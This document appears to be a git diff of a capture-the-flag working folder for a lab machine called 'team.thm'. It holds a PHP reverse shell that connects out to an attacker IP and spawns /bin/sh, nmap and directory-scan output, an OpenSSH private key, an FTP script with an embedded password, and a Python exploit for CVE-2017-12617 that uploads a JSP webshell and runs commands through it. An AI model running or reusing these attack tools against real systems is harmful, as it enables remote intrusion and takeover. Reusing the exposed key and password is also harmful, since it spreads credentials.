// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
|
||||||
|
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
|
||||||
|
//
|
||||||
|
// Usage
|
||||||
|
// -----
|
||||||
|
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
|
||||||
|
|
||||||
|
set_time_limit (0);
|
||||||
|
$VERSION = "1.0";
|
||||||
|
$ip = '192.168.138.181'; // CHANGE THIS
|
||||||
|
$port = 4444; // CHANGE THIS
|
||||||
|
$chunk_size = 1400;
|
||||||
|
$write_a = null;
|
||||||
|
$error_a = null;
|
||||||
|
$shell = 'uname -a; w; id; /bin/sh -i';
|
||||||
|
$daemon = 0;
|
||||||
|
$debug = 0;
|
||||||
|
|
||||||
|
//
|
||||||
|
// Daemonise ourself if possible to avoid zombies later
|
||||||
|
//
|
||||||
|
|
||||||
|
// pcntl_fork is hardly ever available, but will allow us to daemonise
|
||||||
|
// our php process and avoid zombies. Worth a try...
|
||||||
|
if (function_exists('pcntl_fork')) {
|
||||||
|
// Fork and have the parent process exit
|
||||||
|
$pid = pcntl_fork();
|
||||||
|
|
||||||
|
if ($pid == -1) {
|
||||||
|
printit("ERROR: Can't fork");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($pid) {
|
||||||
|
exit(0); // Parent exits
|
||||||
|
}
|
||||||
|
|
||||||
|
// Make the current process a session leader
|
||||||
|
// Will only succeed if we forked
|
||||||
|
if (posix_setsid() == -1) {
|
||||||
|
printit("Error: Can't setsid()");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
$daemon = 1;
|
||||||
|
} else {
|
||||||
|
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
|
||||||
|
}
|
||||||
|
|
||||||
|
// Change to a safe directory
|
||||||
|
chdir("/");
|
||||||
|
|
||||||
|
// Remove any umask we inherited
|
||||||
|
umask(0);
|
||||||
|
|
||||||
|
//
|
||||||
|
// Do the reverse shell...
|
||||||
|
//
|
||||||
|
|
||||||
|
// Open reverse connection
|
||||||
|
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
|
||||||
|
if (!$sock) {
|
||||||
|
printit("$errstr ($errno)");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Spawn shell process
|
||||||
|
$descriptorspec = array(
|
||||||
|
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
|
||||||
|
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
|
||||||
|
2 => array("pipe", "w") // stderr is a pipe that the child will write to
|
||||||
|
);
|
||||||
|
|
||||||
|
$process = proc_open($shell, $descriptorspec, $pipes);
|
||||||
|
|
||||||
|
if (!is_resource($process)) {
|
||||||
|
printit("ERROR: Can't spawn shell");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Set everything to non-blocking
|
||||||
|
// Reason: Occsionally reads will block, even though stream_select tells us they won't
|
||||||
|
stream_set_blocking($pipes[0], 0);
|
||||||
|
stream_set_blocking($pipes[1], 0);
|
||||||
|
stream_set_blocking($pipes[2], 0);
|
||||||
|
stream_set_blocking($sock, 0);
|
||||||
|
|
||||||
|
printit("Successfully opened reverse shell to $ip:$port");
|
||||||
|
|
||||||
|
while (1) {
|
||||||
|
// Check for end of TCP connection
|
||||||
|
if (feof($sock)) {
|
||||||
|
printit("ERROR: Shell connection terminated");
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check for end of STDOUT
|
||||||
|
if (feof($pipes[1])) {
|
||||||
|
printit("ERROR: Shell process terminated");
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Wait until a command is end down $sock, or some
|
||||||
|
// command output is available on STDOUT or STDERR
|
||||||
|
$read_a = array($sock, $pipes[1], $pipes[2]);
|
||||||
|
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
|
||||||
|
|
||||||
|
// If we can read from the TCP socket, send
|
||||||
|
// data to process's STDIN
|
||||||
|
if (in_array($sock, $read_a)) {
|
||||||
|
if ($debug) printit("SOCK READ");
|
||||||
|
$input = fread($sock, $chunk_size);
|
||||||
|
if ($debug) printit("SOCK: $input");
|
||||||
|
fwrite($pipes[0], $input);
|
||||||
|
}
|
||||||
|
|
||||||
|
// If we can read from the process's STDOUT
|
||||||
|
// send data down tcp connection
|
||||||
|
if (in_array($pipes[1], $read_a)) {
|
||||||
|
if ($debug) printit("STDOUT READ");
|
||||||
|
$input = fread($pipes[1], $chunk_size);
|
||||||
|
if ($debug) printit("STDOUT: $input");
|
||||||
|
fwrite($sock, $input);
|
||||||
|
}
|
||||||
|
|
||||||
|
// If we can read from the process's STDERR
|
||||||
|
// send data down tcp connection
|
||||||
|
if (in_array($pipes[2], $read_a)) {
|
||||||
|
if ($debug) printit("STDERR READ");
|
||||||
|
$input = fread($pipes[2], $chunk_size);
|
||||||
|
if ($debug) printit("STDERR: $input");
|
||||||
|
fwrite($sock, $input);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
fclose($sock);
|
||||||
|
fclose($pipes[0]);
|
||||||
|
fclose($pipes[1]);
|
||||||
|
fclose($pipes[2]);
|
||||||
|
proc_close($process);
|
||||||
|
|
||||||
|
// Like print, but does nothing if we've daemonised ourself
|
||||||
|
// (I can't figure out how to redirect STDOUT like a proper daemon)
|
||||||
|
function printit ($string) {
|
||||||
|
if (!$daemon) {
|
||||||
|
print "$string\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
Binary file not shown.
@@ -0,0 +1,2 @@
|
|||||||
|
maya
|
||||||
|
Maya
|
||||||
@@ -0,0 +1,7 @@
|
|||||||
|
Dale
|
||||||
|
I have started coding a new website in PHP for the team to use, this is currently under development. It can be
|
||||||
|
found at ".dev" within our domain.
|
||||||
|
|
||||||
|
Also as per the team policy please make a copy of your "id_rsa" and place this in the relevent config file.
|
||||||
|
|
||||||
|
Gyles
|
||||||
@@ -0,0 +1,5 @@
|
|||||||
|
.hta [33m (Status: 403)[0m [Size: 277]
|
||||||
|
.htaccess [33m (Status: 403)[0m [Size: 277]
|
||||||
|
.htpasswd [33m (Status: 403)[0m [Size: 277]
|
||||||
|
index.html [32m (Status: 200)[0m [Size: 11366]
|
||||||
|
server-status [33m (Status: 403)[0m [Size: 277]
|
||||||
@@ -0,0 +1 @@
|
|||||||
|
server-status [33m (Status: 403)[0m [Size: 277]
|
||||||
@@ -0,0 +1,3 @@
|
|||||||
|
images [36m (Status: 301)[0m [Size: 305][34m [--> http://team.thm/images/][0m
|
||||||
|
scripts [36m (Status: 301)[0m [Size: 306][34m [--> http://team.thm/scripts/][0m
|
||||||
|
assets [36m (Status: 301)[0m [Size: 305][34m [--> http://team.thm/assets/][0m
|
||||||
@@ -0,0 +1,38 @@
|
|||||||
|
-----BEGIN OPENSSH PRIVATE KEY-----
|
||||||
|
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
|
||||||
|
-----END OPENSSH PRIVATE KEY-----
|
||||||
@@ -0,0 +1,28 @@
|
|||||||
|
# Nmap 7.99 scan initiated Wed Apr 29 15:29:45 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -oN nmap_scan01.txt 10.81.161.28
|
||||||
|
Nmap scan report for 10.81.161.28
|
||||||
|
Host is up (0.059s latency).
|
||||||
|
Not shown: 997 filtered tcp ports (no-response)
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
21/tcp open ftp vsftpd 3.0.5
|
||||||
|
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
|
||||||
|
| ssh-hostkey:
|
||||||
|
| 3072 7d:1b:f6:fa:70:b0:9a:be:52:a1:cb:85:1f:89:5f:4e (RSA)
|
||||||
|
| 256 b6:bc:3b:d8:b7:5f:b5:8e:58:89:78:11:08:a9:26:3d (ECDSA)
|
||||||
|
|_ 256 0a:ce:96:65:93:9a:4f:d7:8e:2e:f4:9d:7a:c9:e7:6f (ED25519)
|
||||||
|
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|
||||||
|
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
|
||||||
|
|_http-server-header: Apache/2.4.41 (Ubuntu)
|
||||||
|
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
|
||||||
|
Aggressive OS guesses: Linux 4.15 - 5.19 (91%), Linux 5.14 - 6.8 (91%), Linux 4.15 (90%), Linux 5.4 - 5.15 (90%), Crestron XPanel control system (86%), Linux 3.8 - 3.16 (86%), Android 10 - 12 (Linux 4.14 - 4.19) (85%), HP P2000 G3 NAS device (85%)
|
||||||
|
No exact OS matches for host (test conditions non-ideal).
|
||||||
|
Network Distance: 3 hops
|
||||||
|
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||||||
|
|
||||||
|
TRACEROUTE (using port 21/tcp)
|
||||||
|
HOP RTT ADDRESS
|
||||||
|
1 57.23 ms 192.168.128.1
|
||||||
|
2 ...
|
||||||
|
3 56.79 ms 10.81.161.28
|
||||||
|
|
||||||
|
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Wed Apr 29 15:30:13 2026 -- 1 IP address (1 host up) scanned in 28.24 seconds
|
||||||
@@ -0,0 +1,31 @@
|
|||||||
|
# Nmap 7.99 scan initiated Wed Apr 29 15:51:44 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_big.txt 10.81.161.28
|
||||||
|
Nmap scan report for 10.81.161.28
|
||||||
|
Host is up (0.052s latency).
|
||||||
|
Not shown: 65532 filtered tcp ports (no-response)
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
21/tcp open ftp vsftpd 3.0.5
|
||||||
|
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
|
||||||
|
| ssh-hostkey:
|
||||||
|
| 3072 7d:1b:f6:fa:70:b0:9a:be:52:a1:cb:85:1f:89:5f:4e (RSA)
|
||||||
|
| 256 b6:bc:3b:d8:b7:5f:b5:8e:58:89:78:11:08:a9:26:3d (ECDSA)
|
||||||
|
|_ 256 0a:ce:96:65:93:9a:4f:d7:8e:2e:f4:9d:7a:c9:e7:6f (ED25519)
|
||||||
|
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|
||||||
|
|_http-title: Apache2 Ubuntu Default Page: It works! If you see this add 'te...
|
||||||
|
|_http-server-header: Apache/2.4.41 (Ubuntu)
|
||||||
|
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
|
||||||
|
Device type: general purpose|specialized
|
||||||
|
Running (JUST GUESSING): Linux 4.X|5.X|6.X|3.X (91%), Crestron 2-Series (85%)
|
||||||
|
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:6 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:3
|
||||||
|
Aggressive OS guesses: Linux 4.15 - 5.19 (91%), Linux 5.14 - 6.8 (91%), Linux 4.15 (89%), Linux 5.4 - 5.15 (89%), Crestron XPanel control system (85%), Linux 3.8 - 3.16 (85%)
|
||||||
|
No exact OS matches for host (test conditions non-ideal).
|
||||||
|
Network Distance: 3 hops
|
||||||
|
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||||||
|
|
||||||
|
TRACEROUTE (using port 22/tcp)
|
||||||
|
HOP RTT ADDRESS
|
||||||
|
1 52.41 ms 192.168.128.1
|
||||||
|
2 ...
|
||||||
|
3 52.45 ms 10.81.161.28
|
||||||
|
|
||||||
|
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Wed Apr 29 15:53:34 2026 -- 1 IP address (1 host up) scanned in 110.75 seconds
|
||||||
@@ -0,0 +1,31 @@
|
|||||||
|
# Nmap 7.99 scan initiated Wed Apr 29 16:39:38 2026 as: /usr/lib/nmap/nmap --privileged -A -T4 -p- -oN nmap_scan_domain.txt team.thm
|
||||||
|
Nmap scan report for team.thm (10.81.161.28)
|
||||||
|
Host is up (0.051s latency).
|
||||||
|
Not shown: 65532 filtered tcp ports (no-response)
|
||||||
|
PORT STATE SERVICE VERSION
|
||||||
|
21/tcp open ftp vsftpd 3.0.5
|
||||||
|
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
|
||||||
|
| ssh-hostkey:
|
||||||
|
| 3072 7d:1b:f6:fa:70:b0:9a:be:52:a1:cb:85:1f:89:5f:4e (RSA)
|
||||||
|
| 256 b6:bc:3b:d8:b7:5f:b5:8e:58:89:78:11:08:a9:26:3d (ECDSA)
|
||||||
|
|_ 256 0a:ce:96:65:93:9a:4f:d7:8e:2e:f4:9d:7a:c9:e7:6f (ED25519)
|
||||||
|
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|
||||||
|
|_http-server-header: Apache/2.4.41 (Ubuntu)
|
||||||
|
|_http-title: Team
|
||||||
|
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
|
||||||
|
Device type: general purpose|specialized
|
||||||
|
Running (JUST GUESSING): Linux 4.X|5.X|6.X|3.X (91%), Crestron 2-Series (85%)
|
||||||
|
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:linux:linux_kernel:6 cpe:/o:crestron:2_series cpe:/o:linux:linux_kernel:3
|
||||||
|
Aggressive OS guesses: Linux 4.15 - 5.19 (91%), Linux 5.14 - 6.8 (91%), Linux 4.15 (89%), Linux 5.4 - 5.15 (89%), Crestron XPanel control system (85%), Linux 3.8 - 3.16 (85%)
|
||||||
|
No exact OS matches for host (test conditions non-ideal).
|
||||||
|
Network Distance: 3 hops
|
||||||
|
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
|
||||||
|
|
||||||
|
TRACEROUTE (using port 80/tcp)
|
||||||
|
HOP RTT ADDRESS
|
||||||
|
1 51.10 ms 192.168.128.1
|
||||||
|
2 ...
|
||||||
|
3 51.11 ms team.thm (10.81.161.28)
|
||||||
|
|
||||||
|
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
|
||||||
|
# Nmap done at Wed Apr 29 16:41:29 2026 -- 1 IP address (1 host up) scanned in 111.12 seconds
|
||||||
@@ -0,0 +1,18 @@
|
|||||||
|
#!/bin/bash
|
||||||
|
read -p "Enter Username: " ftpuser
|
||||||
|
read -sp "Enter Username Password: " T3@m$h@r3
|
||||||
|
echo
|
||||||
|
ftp_server="localhost"
|
||||||
|
ftp_username="$Username"
|
||||||
|
ftp_password="$Password"
|
||||||
|
mkdir /home/username/linux/source_folder
|
||||||
|
source_folder="/home/username/source_folder/"
|
||||||
|
cp -avr config* $source_folder
|
||||||
|
dest_folder="/home/username/linux/dest_folder/"
|
||||||
|
ftp -in $ftp_server <<END_SCRIPT
|
||||||
|
quote USER $ftp_username
|
||||||
|
quote PASS $decrypt
|
||||||
|
cd $source_folder
|
||||||
|
!cd $dest_folder
|
||||||
|
mget -R *
|
||||||
|
quit
|
||||||
@@ -0,0 +1,224 @@
|
|||||||
|
#!/usr/bin/python
|
||||||
|
import requests
|
||||||
|
import re
|
||||||
|
import signal
|
||||||
|
from optparse import OptionParser
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
class bcolors:
|
||||||
|
HEADER = '\033[95m'
|
||||||
|
OKBLUE = '\033[94m'
|
||||||
|
OKGREEN = '\033[92m'
|
||||||
|
WARNING = '\033[93m'
|
||||||
|
FAIL = '\033[91m'
|
||||||
|
ENDC = '\033[0m'
|
||||||
|
BOLD = '\033[1m'
|
||||||
|
UNDERLINE = '\033[4m'
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
banner="""
|
||||||
|
|
||||||
|
|
||||||
|
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
|
||||||
|
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
|
||||||
|
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
|
||||||
|
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
|
||||||
|
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
|
||||||
|
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
[@intx0x80]
|
||||||
|
|
||||||
|
"""
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def signal_handler(signal, frame):
|
||||||
|
|
||||||
|
print ("\033[91m"+"\n[-] Exiting"+"\033[0m")
|
||||||
|
|
||||||
|
exit()
|
||||||
|
|
||||||
|
signal.signal(signal.SIGINT, signal_handler)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def removetags(tags):
|
||||||
|
remove = re.compile('<.*?>')
|
||||||
|
txt = re.sub(remove, '\n', tags)
|
||||||
|
return txt.replace("\n\n\n","\n")
|
||||||
|
|
||||||
|
|
||||||
|
def getContent(url,f):
|
||||||
|
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
|
||||||
|
requests.packages.urllib3.disable_warnings()
|
||||||
|
re=requests.get(str(url)+"/"+str(f), headers=headers,verify=False)
|
||||||
|
return re.content
|
||||||
|
|
||||||
|
def createPayload(url,f):
|
||||||
|
evil='<% out.println("AAAAAAAAAAAAAAAAAAAAAAAAAAAAA");%>'
|
||||||
|
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
|
||||||
|
requests.packages.urllib3.disable_warnings()
|
||||||
|
req=requests.put(str(url)+str(f)+"/",data=evil, headers=headers,verify=False)
|
||||||
|
if req.status_code==201:
|
||||||
|
print "File Created .."
|
||||||
|
|
||||||
|
|
||||||
|
def RCE(url,f):
|
||||||
|
EVIL="""<FORM METHOD=GET ACTION='{}'>""".format(f)+"""
|
||||||
|
<INPUT name='cmd' type=text>
|
||||||
|
<INPUT type=submit value='Run'>
|
||||||
|
</FORM>
|
||||||
|
<%@ page import="java.io.*" %>
|
||||||
|
<%
|
||||||
|
String cmd = request.getParameter("cmd");
|
||||||
|
String output = "";
|
||||||
|
if(cmd != null) {
|
||||||
|
String s = null;
|
||||||
|
try {
|
||||||
|
Process p = Runtime.getRuntime().exec(cmd,null,null);
|
||||||
|
BufferedReader sI = new BufferedReader(new
|
||||||
|
InputStreamReader(p.getInputStream()));
|
||||||
|
while((s = sI.readLine()) != null) { output += s+"</br>"; }
|
||||||
|
} catch(IOException e) { e.printStackTrace(); }
|
||||||
|
}
|
||||||
|
%>
|
||||||
|
<pre><%=output %></pre>"""
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
|
||||||
|
requests.packages.urllib3.disable_warnings()
|
||||||
|
req=requests.put(str(url)+f+"/",data=EVIL, headers=headers,verify=False)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
def shell(url,f):
|
||||||
|
|
||||||
|
while True:
|
||||||
|
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36'}
|
||||||
|
cmd=raw_input("$ ")
|
||||||
|
payload={'cmd':cmd}
|
||||||
|
if cmd=="q" or cmd=="Q":
|
||||||
|
break
|
||||||
|
requests.packages.urllib3.disable_warnings()
|
||||||
|
re=requests.get(str(url)+"/"+str(f),params=payload,headers=headers,verify=False)
|
||||||
|
re=str(re.content)
|
||||||
|
t=removetags(re)
|
||||||
|
print t
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
#print bcolors.HEADER+ banner+bcolors.ENDC
|
||||||
|
|
||||||
|
parse=OptionParser(
|
||||||
|
|
||||||
|
|
||||||
|
bcolors.HEADER+"""
|
||||||
|
|
||||||
|
|
||||||
|
_______ ________ ___ ___ __ ______ __ ___ __ __ ______
|
||||||
|
/ ____\ \ / / ____| |__ \ / _ \/_ |____ | /_ |__ \ / //_ |____ |
|
||||||
|
| | \ \ / /| |__ ______ ) | | | || | / /_____| | ) / /_ | | / /
|
||||||
|
| | \ \/ / | __|______/ /| | | || | / /______| | / / '_ \| | / /
|
||||||
|
| |____ \ / | |____ / /_| |_| || | / / | |/ /| (_) | | / /
|
||||||
|
\_____| \/ |______| |____|\___/ |_|/_/ |_|____\___/|_|/_/
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
./cve-2017-12617.py [options]
|
||||||
|
|
||||||
|
options:
|
||||||
|
|
||||||
|
-u ,--url [::] check target url if it's vulnerable
|
||||||
|
-p,--pwn [::] generate webshell and upload it
|
||||||
|
-l,--list [::] hosts list
|
||||||
|
|
||||||
|
[+]usage:
|
||||||
|
|
||||||
|
./cve-2017-12617.py -u http://127.0.0.1
|
||||||
|
./cve-2017-12617.py --url http://127.0.0.1
|
||||||
|
./cve-2017-12617.py -u http://127.0.0.1 -p pwn
|
||||||
|
./cve-2017-12617.py --url http://127.0.0.1 -pwn pwn
|
||||||
|
./cve-2017-12617.py -l hotsts.txt
|
||||||
|
./cve-2017-12617.py --list hosts.txt
|
||||||
|
|
||||||
|
|
||||||
|
[@intx0x80]
|
||||||
|
|
||||||
|
"""+bcolors.ENDC
|
||||||
|
|
||||||
|
)
|
||||||
|
|
||||||
|
|
||||||
|
parse.add_option("-u","--url",dest="U",type="string",help="Website Url")
|
||||||
|
parse.add_option("-p","--pwn",dest="P",type="string",help="generate webshell and upload it")
|
||||||
|
parse.add_option("-l","--list",dest="L",type="string",help="hosts File")
|
||||||
|
|
||||||
|
(opt,args)=parse.parse_args()
|
||||||
|
|
||||||
|
if opt.U==None and opt.P==None and opt.L==None:
|
||||||
|
print(parse.usage)
|
||||||
|
exit(0)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
else:
|
||||||
|
if opt.U!=None and opt.P==None and opt.L==None:
|
||||||
|
print bcolors.OKGREEN+banner+bcolors.ENDC
|
||||||
|
url=str(opt.U)
|
||||||
|
checker="Poc.jsp"
|
||||||
|
print bcolors.BOLD +"Poc Filename {}".format(checker)
|
||||||
|
createPayload(str(url)+"/",checker)
|
||||||
|
con=getContent(str(url)+"/",checker)
|
||||||
|
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
|
||||||
|
print bcolors.WARNING+url+' it\'s Vulnerable to CVE-2017-12617'+bcolors.ENDC
|
||||||
|
print bcolors.WARNING+url+"/"+checker+bcolors.ENDC
|
||||||
|
|
||||||
|
else:
|
||||||
|
print 'Not Vulnerable to CVE-2017-12617 '
|
||||||
|
elif opt.P!=None and opt.U!=None and opt.L==None:
|
||||||
|
print bcolors.OKGREEN+banner+bcolors.ENDC
|
||||||
|
pwn=str(opt.P)
|
||||||
|
url=str(opt.U)
|
||||||
|
print "Uploading Webshell ....."
|
||||||
|
pwn=pwn+".jsp"
|
||||||
|
RCE(str(url)+"/",pwn)
|
||||||
|
shell(str(url),pwn)
|
||||||
|
elif opt.L!=None and opt.P==None and opt.U==None:
|
||||||
|
print bcolors.OKGREEN+banner+bcolors.ENDC
|
||||||
|
w=str(opt.L)
|
||||||
|
f=open(w,"r")
|
||||||
|
print "Scaning hosts in {}".format(w)
|
||||||
|
checker="Poc.jsp"
|
||||||
|
for i in f.readlines():
|
||||||
|
i=i.strip("\n")
|
||||||
|
createPayload(str(i)+"/",checker)
|
||||||
|
con=getContent(str(i)+"/",checker)
|
||||||
|
if 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAA' in con:
|
||||||
|
print str(i)+"\033[91m"+" [ Vulnerable ] ""\033[0m"
|
||||||
|
|
